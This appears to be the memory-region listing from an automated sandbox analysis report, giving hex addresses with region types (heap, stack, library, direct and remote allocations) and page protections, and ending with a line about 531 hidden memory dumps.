6F10FFE000
|
stack
|
page read and write
|
||
|
7110000
|
trusted library allocation
|
page read and write
|
||
|
7C80000
|
trusted library allocation
|
page read and write
|
||
|
771000
|
heap
|
page read and write
|
||
|
2322E000
|
stack
|
page read and write
|
||
|
59C0000
|
heap
|
page read and write
|
||
|
2E075947000
|
heap
|
page read and write
|
||
|
2E075951000
|
heap
|
page read and write
|
||
|
192E5E38000
|
heap
|
page read and write
|
||
|
192E6086000
|
heap
|
page read and write
|
||
|
2E05F81C000
|
trusted library allocation
|
page read and write
|
||
|
192E5E7D000
|
heap
|
page read and write
|
||
|
20ECE000
|
stack
|
page read and write
|
||
|
7FF848C34000
|
trusted library allocation
|
page read and write
|
||
|
2E075CF1000
|
heap
|
page read and write
|
||
|
3715000
|
remote allocation
|
page execute and read and write
|
||
|
192E5E70000
|
heap
|
page read and write
|
||
|
192E3D84000
|
heap
|
page read and write
|
||
|
659000
|
heap
|
page read and write
|
||
|
6D0E000
|
stack
|
page read and write
|
||
|
68D0000
|
direct allocation
|
page read and write
|
||
|
2E06D601000
|
trusted library allocation
|
page read and write
|
||
|
740000
|
heap
|
page read and write
|
||
|
192E5EAB000
|
heap
|
page read and write
|
||
|
7FF848C8C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7F29000
|
heap
|
page read and write
|
||
|
20FD0000
|
direct allocation
|
page read and write
|
||
|
6A8C000
|
stack
|
page read and write
|
||
|
6C3E000
|
stack
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
FF96FF9000
|
stack
|
page read and write
|
||
|
FF969DE000
|
stack
|
page read and write
|
||
|
6F112FB000
|
stack
|
page read and write
|
||
|
21151000
|
trusted library allocation
|
page read and write
|
||
|
76F000
|
heap
|
page read and write
|
||
|
67BE000
|
stack
|
page read and write
|
||
|
20CED000
|
stack
|
page read and write
|
||
|
FF9733F000
|
stack
|
page read and write
|
||
|
7FF848C32000
|
trusted library allocation
|
page read and write
|
||
|
192E3D89000
|
heap
|
page read and write
|
||
|
192E5E2E000
|
heap
|
page read and write
|
||
|
42E5000
|
heap
|
page execute and read and write
|
||
|
A795000
|
direct allocation
|
page execute and read and write
|
||
|
2E075A05000
|
heap
|
page read and write
|
||
|
2E05E45F000
|
trusted library allocation
|
page read and write
|
||
|
192E5E88000
|
heap
|
page read and write
|
||
|
192E3D89000
|
heap
|
page read and write
|
||
|
2E05F3BA000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
7F47000
|
heap
|
page read and write
|
||
|
2E05BD30000
|
trusted library allocation
|
page read and write
|
||
|
5830000
|
direct allocation
|
page read and write
|
||
|
8D9000
|
trusted library allocation
|
page read and write
|
||
|
7DB5000
|
trusted library allocation
|
page read and write
|
||
|
192E5AC7000
|
heap
|
page read and write
|
||
|
7B50000
|
trusted library allocation
|
page read and write
|
||
|
FF9800B000
|
stack
|
page read and write
|
||
|
FF97F8A000
|
stack
|
page read and write
|
||
|
192E3D8A000
|
heap
|
page read and write
|
||
|
2E05F37D000
|
trusted library allocation
|
page read and write
|
||
|
5940000
|
heap
|
page read and write
|
||
|
9C8000
|
trusted library allocation
|
page read and write
|
||
|
2E075C9A000
|
heap
|
page read and write
|
||
|
708D000
|
stack
|
page read and write
|
||
|
7F10000
|
heap
|
page read and write
|
||
|
192E5AC5000
|
heap
|
page read and write
|
||
|
2256000
|
unkown
|
page read and write
|
||
|
192E5E70000
|
heap
|
page read and write
|
||
|
8EA000
|
trusted library allocation
|
page execute and read and write
|
||
|
FF96CFE000
|
stack
|
page read and write
|
||
|
7FF848CE0000
|
trusted library allocation
|
page read and write
|
||
|
5880000
|
direct allocation
|
page read and write
|
||
|
43A3000
|
trusted library allocation
|
page read and write
|
||
|
59C0000
|
heap
|
page read and write
|
||
|
2E075AE0000
|
heap
|
page read and write
|
||
|
6CCE000
|
stack
|
page read and write
|
||
|
192E5B33000
|
heap
|
page read and write
|
||
|
2E05D3B0000
|
heap
|
page read and write
|
||
|
192E3D0A000
|
heap
|
page read and write
|
||
|
2E05BAE8000
|
heap
|
page read and write
|
||
|
59BA000
|
heap
|
page read and write
|
||
|
69CE000
|
stack
|
page read and write
|
||
|
598D000
|
heap
|
page read and write
|
||
|
8F5000
|
trusted library allocation
|
page execute and read and write
|
||
|
192E6080000
|
heap
|
page read and write
|
||
|
6B15000
|
heap
|
page read and write
|
||
|
192E5AD4000
|
heap
|
page read and write
|
||
|
2E0759C4000
|
heap
|
page read and write
|
||
|
81A0000
|
trusted library allocation
|
page read and write
|
||
|
2E05DA7D000
|
trusted library allocation
|
page read and write
|
||
|
2E05BB50000
|
heap
|
page read and write
|
||
|
192E5AC9000
|
heap
|
page read and write
|
||
|
2109C000
|
stack
|
page read and write
|
||
|
7DF4D2640000
|
trusted library allocation
|
page execute and read and write
|
||
|
192E5E2C000
|
heap
|
page read and write
|
||
|
192E5AC2000
|
heap
|
page read and write
|
||
|
99E000
|
stack
|
page read and write
|
||
|
6F110FE000
|
stack
|
page read and write
|
||
|
2326E000
|
stack
|
page read and write
|
||
|
655000
|
heap
|
page read and write
|
||
|
192E5B13000
|
heap
|
page read and write
|
||
|
192E5B43000
|
heap
|
page read and write
|
||
|
59B3000
|
heap
|
page read and write
|
||
|
688B000
|
stack
|
page read and write
|
||
|
192E5E70000
|
heap
|
page read and write
|
||
|
2E05BA90000
|
heap
|
page readonly
|
||
|
192E3C00000
|
heap
|
page read and write
|
||
|
192E3D84000
|
heap
|
page read and write
|
||
|
7FF848C40000
|
trusted library allocation
|
page read and write
|
||
|
59BD000
|
heap
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
70C000
|
heap
|
page read and write
|
||
|
20DFE000
|
stack
|
page read and write
|
||
|
2E05D455000
|
heap
|
page read and write
|
||
|
83D000
|
stack
|
page read and write
|
||
|
9D95000
|
direct allocation
|
page execute and read and write
|
||
|
2E05BB34000
|
heap
|
page read and write
|
||
|
2E075AD0000
|
heap
|
page execute and read and write
|
||
|
B90000
|
trusted library allocation
|
page read and write
|
||
|
6C7E000
|
stack
|
page read and write
|
||
|
7FC000
|
heap
|
page read and write
|
||
|
2E05F760000
|
trusted library allocation
|
page read and write
|
||
|
6FCE000
|
stack
|
page read and write
|
||
|
7FF848DE1000
|
trusted library allocation
|
page read and write
|
||
|
684D000
|
stack
|
page read and write
|
||
|
2265000
|
unkown
|
page read and write
|
||
|
734000
|
heap
|
page read and write
|
||
|
7FB50000
|
trusted library allocation
|
page execute and read and write
|
||
|
7EAD000
|
stack
|
page read and write
|
||
|
192E5AD4000
|
heap
|
page read and write
|
||
|
6D10000
|
heap
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page execute and read and write
|
||
|
192E5B0F000
|
heap
|
page read and write
|
||
|
7FF848D50000
|
trusted library allocation
|
page execute and read and write
|
||
|
700000
|
heap
|
page read and write
|
||
|
20F30000
|
remote allocation
|
page read and write
|
||
|
192E5AC1000
|
heap
|
page read and write
|
||
|
6F111FF000
|
stack
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
819C000
|
stack
|
page read and write
|
||
|
58E0000
|
heap
|
page read and write
|
||
|
B80000
|
trusted library allocation
|
page execute and read and write
|
||
|
8110000
|
trusted library allocation
|
page execute and read and write
|
||
|
192E5AC0000
|
heap
|
page read and write
|
||
|
578E000
|
unkown
|
page read and write
|
||
|
5840000
|
direct allocation
|
page read and write
|
||
|
192E5DC0000
|
heap
|
page read and write
|
||
|
2E05DA94000
|
trusted library allocation
|
page read and write
|
||
|
69E000
|
stack
|
page read and write
|
||
|
2E05BAEE000
|
heap
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
70A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
192E5E61000
|
heap
|
page read and write
|
||
|
68C0000
|
direct allocation
|
page read and write
|
||
|
20E8D000
|
stack
|
page read and write
|
||
|
2E05BA80000
|
trusted library allocation
|
page read and write
|
||
|
2E05F416000
|
trusted library allocation
|
page read and write
|
||
|
7C10000
|
trusted library allocation
|
page execute and read and write
|
||
|
20DB0000
|
trusted library allocation
|
page read and write
|
||
|
2E05BAEC000
|
heap
|
page read and write
|
||
|
192E5EB4000
|
heap
|
page read and write
|
||
|
6F109FE000
|
stack
|
page read and write
|
||
|
7100000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
81F0000
|
direct allocation
|
page read and write
|
||
|
20E3F000
|
stack
|
page read and write
|
||
|
5341000
|
trusted library allocation
|
page read and write
|
||
|
58C0000
|
direct allocation
|
page read and write
|
||
|
2E05DA98000
|
trusted library allocation
|
page read and write
|
||
|
5870000
|
direct allocation
|
page read and write
|
||
|
192E5E7D000
|
heap
|
page read and write
|
||
|
192E3D8B000
|
heap
|
page read and write
|
||
|
2E075A2C000
|
heap
|
page read and write
|
||
|
225C000
|
unkown
|
page read and write
|
||
|
FF9723F000
|
stack
|
page read and write
|
||
|
6D90000
|
heap
|
page read and write
|
||
|
5890000
|
direct allocation
|
page read and write
|
||
|
6E38000
|
trusted library allocation
|
page read and write
|
||
|
192E5E01000
|
heap
|
page read and write
|
||
|
20D2E000
|
stack
|
page read and write
|
||
|
88E0000
|
direct allocation
|
page execute and read and write
|
||
|
66FE000
|
stack
|
page read and write
|
||
|
66BE000
|
stack
|
page read and write
|
||
|
2E05D5F0000
|
heap
|
page execute and read and write
|
||
|
7C30000
|
trusted library allocation
|
page read and write
|
||
|
6F80000
|
heap
|
page read and write
|
||
|
2259000
|
unkown
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
192E5E22000
|
heap
|
page read and write
|
||
|
694D000
|
stack
|
page read and write
|
||
|
8100000
|
trusted library allocation
|
page read and write
|
||
|
2268000
|
unkown
|
page read and write
|
||
|
2E05DAA8000
|
trusted library allocation
|
page read and write
|
||
|
6F60000
|
trusted library allocation
|
page read and write
|
||
|
2E05F3D4000
|
trusted library allocation
|
page read and write
|
||
|
192E5E8A000
|
heap
|
page read and write
|
||
|
2E05F382000
|
trusted library allocation
|
page read and write
|
||
|
20F30000
|
remote allocation
|
page read and write
|
||
|
192E5AD9000
|
heap
|
page read and write
|
||
|
95E000
|
stack
|
page read and write
|
||
|
2E05F395000
|
trusted library allocation
|
page read and write
|
||
|
2E05E499000
|
trusted library allocation
|
page read and write
|
||
|
192E5ACB000
|
heap
|
page read and write
|
||
|
8D0000
|
trusted library allocation
|
page read and write
|
||
|
FF96E7E000
|
stack
|
page read and write
|
||
|
2E075B04000
|
heap
|
page read and write
|
||
|
225F000
|
unkown
|
page read and write
|
||
|
9E0000
|
heap
|
page read and write
|
||
|
6B20000
|
heap
|
page read and write
|
||
|
192E5E5B000
|
heap
|
page read and write
|
||
|
2E05D826000
|
trusted library allocation
|
page read and write
|
||
|
2E05F3A3000
|
trusted library allocation
|
page read and write
|
||
|
8F0000
|
trusted library allocation
|
page read and write
|
||
|
6A4E000
|
stack
|
page read and write
|
||
|
7E0C000
|
stack
|
page read and write
|
||
|
59C0000
|
heap
|
page read and write
|
||
|
7C60000
|
trusted library allocation
|
page read and write
|
||
|
81B0000
|
trusted library allocation
|
page read and write
|
||
|
5A0A000
|
heap
|
page read and write
|
||
|
70B0000
|
trusted library allocation
|
page read and write
|
||
|
7F3B000
|
heap
|
page read and write
|
||
|
57D0000
|
direct allocation
|
page read and write
|
||
|
192E5AC9000
|
heap
|
page read and write
|
||
|
8F2000
|
trusted library allocation
|
page read and write
|
||
|
2E075A3D000
|
heap
|
page read and write
|
||
|
7C20000
|
trusted library allocation
|
page read and write
|
||
|
2E05BAA0000
|
heap
|
page read and write
|
||
|
719B000
|
stack
|
page read and write
|
||
|
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
|
192E3D89000
|
heap
|
page read and write
|
||
|
192E3CFE000
|
heap
|
page read and write
|
||
|
20F30000
|
remote allocation
|
page read and write
|
||
|
2E075C98000
|
heap
|
page read and write
|
||
|
4341000
|
trusted library allocation
|
page read and write
|
||
|
880000
|
heap
|
page read and write
|
||
|
192E5B1B000
|
heap
|
page read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
6F50000
|
heap
|
page execute and read and write
|
||
|
20DAC000
|
stack
|
page read and write
|
||
|
3660000
|
remote allocation
|
page execute and read and write
|
||
|
8230000
|
direct allocation
|
page read and write
|
||
|
48C000
|
stack
|
page read and write
|
||
|
2E05D3F0000
|
trusted library allocation
|
page read and write
|
||
|
2E05BAAD000
|
heap
|
page read and write
|
||
|
FF9703F000
|
stack
|
page read and write
|
||
|
2E075BF4000
|
heap
|
page read and write
|
||
|
2E075A10000
|
heap
|
page read and write
|
||
|
2E05B9E0000
|
heap
|
page read and write
|
||
|
7AF000
|
heap
|
page read and write
|
||
|
6DC2000
|
heap
|
page read and write
|
||
|
6D50000
|
heap
|
page read and write
|
||
|
192E5AC5000
|
heap
|
page read and write
|
||
|
FF96953000
|
stack
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
6890000
|
direct allocation
|
page read and write
|
||
|
2E05F44C000
|
trusted library allocation
|
page read and write
|
||
|
2E05D686000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
192E3CB9000
|
heap
|
page read and write
|
||
|
6F10DFE000
|
stack
|
page read and write
|
||
|
192E5C01000
|
heap
|
page read and write
|
||
|
FF96F7E000
|
stack
|
page read and write
|
||
|
7BAE000
|
stack
|
page read and write
|
||
|
4330000
|
heap
|
page read and write
|
||
|
20D6D000
|
stack
|
page read and write
|
||
|
70C0000
|
trusted library allocation
|
page read and write
|
||
|
9B0000
|
heap
|
page execute and read and write
|
||
|
2E075BE0000
|
heap
|
page read and write
|
||
|
7A6000
|
heap
|
page read and write
|
||
|
650000
|
heap
|
page read and write
|
||
|
6D61000
|
heap
|
page read and write
|
||
|
2E05BACC000
|
heap
|
page read and write
|
||
|
6E52000
|
heap
|
page read and write
|
||
|
192E3C10000
|
heap
|
page read and write
|
||
|
192E5B23000
|
heap
|
page read and write
|
||
|
7B40000
|
trusted library allocation
|
page read and write
|
||
|
6F10CFE000
|
stack
|
page read and write
|
||
|
540000
|
heap
|
page read and write
|
||
|
620000
|
heap
|
page read and write
|
||
|
192E3D86000
|
heap
|
page read and write
|
||
|
192E5ACA000
|
heap
|
page read and write
|
||
|
20FAF000
|
stack
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
2E05F3A7000
|
trusted library allocation
|
page read and write
|
||
|
192E5E45000
|
heap
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
2E05DABC000
|
trusted library allocation
|
page read and write
|
||
|
7DC0000
|
trusted library allocation
|
page read and write
|
||
|
6DE6000
|
heap
|
page read and write
|
||
|
7FF848E17000
|
trusted library allocation
|
page read and write
|
||
|
2E05B9C0000
|
heap
|
page read and write
|
||
|
2E05D5C0000
|
heap
|
page execute and read and write
|
||
|
192E5E36000
|
heap
|
page read and write
|
||
|
59A7000
|
heap
|
page read and write
|
||
|
2E0759B6000
|
heap
|
page read and write
|
||
|
192E5B64000
|
heap
|
page read and write
|
||
|
6A0D000
|
stack
|
page read and write
|
||
|
192E5E7D000
|
heap
|
page read and write
|
||
|
7FF848C30000
|
trusted library allocation
|
page read and write
|
||
|
2E06D8F8000
|
trusted library allocation
|
page read and write
|
||
|
815E000
|
stack
|
page read and write
|
||
|
7FF848C50000
|
trusted library allocation
|
page read and write
|
||
|
192E3CBA000
|
heap
|
page read and write
|
||
|
8240000
|
trusted library allocation
|
page execute and read and write
|
||
|
20C6E000
|
stack
|
page read and write
|
||
|
2E05DA85000
|
trusted library allocation
|
page read and write
|
||
|
7E50000
|
heap
|
page read and write
|
||
|
FF96DFC000
|
stack
|
page read and write
|
||
|
700E000
|
stack
|
page read and write
|
||
|
4B15000
|
remote allocation
|
page execute and read and write
|
||
|
80F0000
|
trusted library allocation
|
page read and write
|
||
|
57E0000
|
heap
|
page read and write
|
||
|
210C0000
|
heap
|
page execute and read and write
|
||
|
8CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E075988000
|
heap
|
page read and write
|
||
|
8200000
|
direct allocation
|
page read and write
|
||
|
8B0000
|
trusted library allocation
|
page read and write
|
||
|
7E4B000
|
stack
|
page read and write
|
||
|
7FF848C33000
|
trusted library allocation
|
page execute and read and write
|
||
|
192E3CFE000
|
heap
|
page read and write
|
||
|
582F000
|
stack
|
page read and write
|
||
|
192E3CBF000
|
heap
|
page read and write
|
||
|
2E05B8E0000
|
heap
|
page read and write
|
||
|
774000
|
heap
|
page read and write
|
||
|
20F6E000
|
stack
|
page read and write
|
||
|
FF96D7F000
|
stack
|
page read and write
|
||
|
7B27000
|
stack
|
page read and write
|
||
|
68F0000
|
direct allocation
|
page read and write
|
||
|
8C4000
|
trusted library allocation
|
page read and write
|
||
|
FF972BE000
|
stack
|
page read and write
|
||
|
192E3C99000
|
heap
|
page read and write
|
||
|
2E075CCE000
|
heap
|
page read and write
|
||
|
2E05DF2D000
|
trusted library allocation
|
page read and write
|
||
|
21A0000
|
heap
|
page readonly
|
||
|
192E3FD5000
|
heap
|
page read and write
|
||
|
673F000
|
stack
|
page read and write
|
||
|
7EF8000
|
heap
|
page read and write
|
||
|
192E3C30000
|
heap
|
page read and write
|
||
|
192E5E7D000
|
heap
|
page read and write
|
||
|
2E075B00000
|
heap
|
page read and write
|
||
|
20FC0000
|
direct allocation
|
page read and write
|
||
|
8C0000
|
trusted library allocation
|
page read and write
|
||
|
2114E000
|
stack
|
page read and write
|
||
|
7B30000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E05BAE5000
|
heap
|
page read and write
|
||
|
192E5E5B000
|
heap
|
page read and write
|
||
|
2E05DAFA000
|
trusted library allocation
|
page read and write
|
||
|
21F0000
|
direct allocation
|
page read and write
|
||
|
6F108FA000
|
stack
|
page read and write
|
||
|
59B3000
|
heap
|
page read and write
|
||
|
2E075940000
|
heap
|
page read and write
|
||
|
192E3CC0000
|
heap
|
page read and write
|
||
|
192E5E26000
|
heap
|
page read and write
|
||
|
2E05BA60000
|
trusted library allocation
|
page read and write
|
||
|
20FF0000
|
heap
|
page read and write
|
||
|
20E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7C70000
|
trusted library allocation
|
page read and write
|
||
|
2E05DBB7000
|
trusted library allocation
|
page read and write
|
||
|
7130000
|
trusted library allocation
|
page read and write
|
||
|
42E0000
|
heap
|
page execute and read and write
|
||
|
7120000
|
trusted library allocation
|
page read and write
|
||
|
192E5E5B000
|
heap
|
page read and write
|
||
|
9EA000
|
heap
|
page read and write
|
||
|
57E5000
|
heap
|
page read and write
|
||
|
2E075C6D000
|
heap
|
page read and write
|
||
|
5369000
|
trusted library allocation
|
page read and write
|
||
|
432E000
|
stack
|
page read and write
|
||
|
FF9743C000
|
stack
|
page read and write
|
||
|
FF97E0E000
|
stack
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
7BEE000
|
stack
|
page read and write
|
||
|
2E06D610000
|
trusted library allocation
|
page read and write
|
||
|
2E05F2D1000
|
trusted library allocation
|
page read and write
|
||
|
21B0000
|
heap
|
page read and write
|
||
|
2E05DAFE000
|
trusted library allocation
|
page read and write
|
||
|
FF973BE000
|
stack
|
page read and write
|
||
|
6E30000
|
trusted library allocation
|
page read and write
|
||
|
2E05E48D000
|
trusted library allocation
|
page read and write
|
||
|
FF96C7E000
|
stack
|
page read and write
|
||
|
4115000
|
remote allocation
|
page execute and read and write
|
||
|
192E5E3D000
|
heap
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848E15000
|
trusted library allocation
|
page read and write
|
||
|
2E05DA87000
|
trusted library allocation
|
page read and write
|
||
|
2E06D8E9000
|
trusted library allocation
|
page read and write
|
||
|
192E3CFE000
|
heap
|
page read and write
|
||
|
192E5E2C000
|
heap
|
page read and write
|
||
|
192E5AC9000
|
heap
|
page read and write
|
||
|
2E05BAC3000
|
heap
|
page read and write
|
||
|
5515000
|
remote allocation
|
page execute and read and write
|
||
|
2262000
|
unkown
|
page read and write
|
||
|
2250000
|
unkown
|
page read and write
|
||
|
192E5E70000
|
heap
|
page read and write
|
||
|
2E05BD50000
|
heap
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
7F43000
|
heap
|
page read and write
|
||
|
6E01000
|
heap
|
page read and write
|
||
|
7F85000
|
heap
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
2E075BEC000
|
heap
|
page read and write
|
||
|
192E5E2D000
|
heap
|
page read and write
|
||
|
192E5E5B000
|
heap
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
59FE000
|
heap
|
page read and write
|
||
|
7C50000
|
trusted library allocation
|
page read and write
|
||
|
192E5E38000
|
heap
|
page read and write
|
||
|
192E3FD0000
|
heap
|
page read and write
|
||
|
6E0000
|
heap
|
page read and write
|
||
|
2E05EE99000
|
trusted library allocation
|
page read and write
|
||
|
59C0000
|
heap
|
page read and write
|
||
|
192E5E7D000
|
heap
|
page read and write
|
||
|
2E05D464000
|
heap
|
page read and write
|
||
|
FF97F0E000
|
stack
|
page read and write
|
||
|
81E0000
|
direct allocation
|
page read and write
|
||
|
2E075AD7000
|
heap
|
page execute and read and write
|
||
|
192E3D39000
|
heap
|
page read and write
|
||
|
192E5E3C000
|
heap
|
page read and write
|
||
|
7EEC000
|
stack
|
page read and write
|
||
|
2E05D3C0000
|
trusted library allocation
|
page read and write
|
||
|
2105C000
|
stack
|
page read and write
|
||
|
70E0000
|
trusted library allocation
|
page read and write
|
||
|
53A6000
|
trusted library allocation
|
page read and write
|
||
|
192E5AD4000
|
heap
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DEA000
|
trusted library allocation
|
page read and write
|
||
|
8C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7140000
|
trusted library allocation
|
page read and write
|
||
|
574E000
|
unkown
|
page read and write
|
||
|
9A0000
|
heap
|
page readonly
|
||
|
2190000
|
heap
|
page read and write
|
||
|
6DE000
|
stack
|
page read and write
|
||
|
192E5E60000
|
heap
|
page read and write
|
||
|
59FB000
|
heap
|
page read and write
|
There are 531 hidden memdumps, click here to show them.